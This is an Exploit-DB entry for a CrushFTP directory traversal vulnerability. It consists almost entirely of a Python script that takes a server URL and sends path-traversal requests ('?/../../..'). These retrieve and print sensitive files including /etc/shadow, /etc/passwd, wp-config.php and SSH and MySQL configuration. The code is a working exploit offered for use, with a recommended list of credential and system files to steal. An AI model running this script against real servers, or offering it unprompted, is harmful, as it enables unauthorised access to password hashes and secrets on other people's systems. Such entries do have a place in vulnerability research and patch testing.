CrushFTP < 11.1.0 - Directory Traversal

EDB-ID:

52012

CVE:

N/A




Platform:

Multiple

Date:

2024-05-13


## Exploit Title: CrushFTP Directory Traversal
## Google Dork: N/A
# Date: 2024-04-30
# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)
## Vendor Homepage: https://www.crushftp.com/
## Software Link: https://www.crushftp.com/download/
## Version: below 10.7.1 and 11.1.0 (as well as legacy 9.x)
## Tested on: Windows10

import requests
import re

# Regular expression to validate the URL
def is_valid_url(url):
    regex = re.compile(
        r'^(?:http|ftp)s?://' # http:// or https://
        r'(?:(?:A-Z0-9?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
        r'localhost|' # localhost...
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|' # ...or ipv4
        r'\[?[A-F0-9]*:[A-F0-9:]+\]?)' # ...or ipv6
        r'(?::\d+)?' # optional: port
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
    return re.match(regex, url) is not None

# Function to scan for the vulnerability
def scan_for_vulnerability(url, target_files):
    print("Scanning for vulnerability in the following files:")
    for target_file in target_files:
        print(target_file)

    for target_file in target_files:
        try:
            response = requests.get(url + "?/../../../../../../../../../../" + target_file, timeout=10)
            if response.status_code == 200 and target_file.split('/')[-1] in response.text:
                print("vulnerability detected in file", target_file)
                print("Content of file", target_file, ":")
                print(response.text)
            else:
                print("vulnerability not detected or unexpected response for file", target_file)
        except requests.exceptions.RequestException as e:
            print("Error connecting to the server:", e)

# User input
input_url = input("Enter the URL of the CrushFTP server: ")

# Validate the URL
if is_valid_url(input_url):
    # Expanded list of allowed files
    target_files = [
        "/var/www/html/index.php",
        "/var/www/html/wp-config.php",
        "/etc/passwd",
        "/etc/shadow",
        "/etc/hosts",
        "/etc/ssh/sshd_config",
        "/etc/mysql/my.cnf",
        # Add more files as needed
        
    ]
    # Start the scan
    scan_for_vulnerability(input_url, target_files)
else:
    print("Invalid URL entered. Please enter a valid URL.")